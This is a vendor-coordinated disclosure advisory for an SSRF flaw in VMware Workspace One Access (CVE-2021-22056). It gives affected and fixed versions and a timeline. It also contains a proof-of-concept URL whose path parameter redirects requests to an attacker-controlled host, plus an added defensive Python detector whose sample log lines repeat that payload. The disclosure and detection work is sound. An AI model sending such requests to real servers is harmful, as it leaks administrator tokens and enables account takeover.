Research Notes
January 17, 2022

Advisory: VMWare Workspace One Access (CVE-2021-22056)


Summary

When authenticated as an administrator user inside VMWare Workspace One Access, it is possible to make the server send HTTP requests to arbitrary URLs and to read the full HTTP response to those requests. Each request carries an Authorization header that contains an admin-level JWT.

Impact

Because no slash character is inserted before the user-supplied path, it is possible for an attacker to make HTTP requests to arbitrary origins and read the full response. Furthermore, the Authorization header is leaked along with the request, so an attacker can weaponize this vulnerability to steal an admin's authorization header when the admin views an image or makes a single click.

Version Tested Against

identity-manager-20.01.0.0-15509389_OVF10.ova - 20.01

Admin token disclosure affects 20.01, but not later versions.

Later versions are still vulnerable to the SSRF vulnerability.

Product Description

Workspace ONE Access, (formerly VMware Identity Manager), provides multi-factor authentication, conditional access and single sign-on to SaaS, web and native mobile apps.

Solution

VMWare’s advisory can be found here.

As per VMWare’s advisory, the following versions are considered fixed:

Fixed Version:

VMware Workspace ONE Access 21.08.0.1
https://docs.vmware.com/en/VMware-Workspace-ONE-Access/21.08.0.1/rn/vmware-workspace-one-access-210801-release-notes/index.html

VMware Workspace ONE Access 21.08, 20.10.0.1, 20.10

https://kb.vmware.com/s/article/87183


VMware Identity Manager (vIDM) 3.3.5, 3.3.4, 3.3.3
https://kb.vmware.com/s/article/87185


Mitre CVE Dictionary Links:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22056

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22057


FIRST CVSSv3 Calculator:
CVE-2021-22056 https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N
CVE-2021-22057 https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Vulnerabilities

https://access.reverse.test/SAAS/API/1.0/REST/system/health/instanceHealth?hostName=access.reverse.test&path=@attackercontrolledhost.com
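The request shape above, worked through from the defender's side. This is an added example, not code from the advisory or from VMware: it models the missing-slash join the Impact section describes, shows a hardened check, and flags instanceHealth requests in constructed access-log lines whose path value would redirect the server-side request to another host. The log format, the benign path value `/SAAS/health`, and the `unsafe_join` model are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

INSTANCE_HEALTH = "/SAAS/API/1.0/REST/system/health/instanceHealth"


def unsafe_join(host_name: str, path: str) -> str:
    # Assumed model of the defect: hostName and path are concatenated with no
    # "/" between them, so a path value starting with "@" turns hostName into
    # the userinfo part and supplies a new authority.
    return "https://" + host_name + path


def is_safe_path(host_name: str, path: str) -> bool:
    # Hardened check (a suggestion, not the vendor's fix): require a leading
    # slash, reject authority/query/fragment delimiters, and confirm the built
    # URL still points at the intended host.
    if not path.startswith("/") or any(c in path for c in "@\\#?"):
        return False
    return urlsplit("https://" + host_name + path).hostname == host_name.lower()


def flag_line(line: str):
    # Returns (hostName, path, resolved_host) when an instanceHealth request
    # would reach a host other than hostName; None otherwise.
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if target.path != INSTANCE_HEALTH:
        return None
    qs = parse_qs(target.query)  # also decodes %40 -> "@"
    host_name = qs.get("hostName", [""])[0]
    path = qs.get("path", [""])[0]
    resolved = urlsplit(unsafe_join(host_name, path)).hostname or ""
    return (host_name, path, resolved) if resolved != host_name.lower() else None


# Constructed sample access-log lines (hypothetical format, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - admin [17/Jan/2022:10:00:01 +0000] "GET /SAAS/API/1.0/REST/system/health/instanceHealth?hostName=access.reverse.test&path=/SAAS/health HTTP/1.1" 200 512',
    '10.0.0.9 - admin [17/Jan/2022:10:00:07 +0000] "GET /SAAS/API/1.0/REST/system/health/instanceHealth?hostName=access.reverse.test&path=%40attackercontrolledhost.com HTTP/1.1" 200 128',
]


def suspicious(lines):
    return [hit for hit in map(flag_line, lines) if hit]


if __name__ == "__main__":
    for host_name, path, resolved in suspicious(SAMPLE_LOG):
        print(f"hostName={host_name} path={path!r} would reach {resolved}")
```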

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.

Credits

Assetnote Security Research Team and Keiran Sampson

Timeline

The timeline for this disclosure process can be found below:

  • Oct 5th, 2021: Disclosure of account takeover via post auth SSRF
  • Oct 5th, 2021: Response from VMWare confirming receipt of vulnerability
  • Nov 9th, 2021: Assetnote Security Research team requests an update on the issue
  • Nov 12th, 2021: Response from VMWare confirming that vulnerability is being worked on
  • Dec 8th, 2021: Assetnote Security Research team requests an update on the issue
  • Dec 8th, 2021: Response from VMWare confirming they could reproduce SSRF but not admin token disclosure on latest version of Workspace One Access
  • Dec 10th, 2021: Response from VMWare confirming progress is being made on fixes
  • Dec 17th, 2021: VMWare publishes advisory

Written by:
Shubham Shah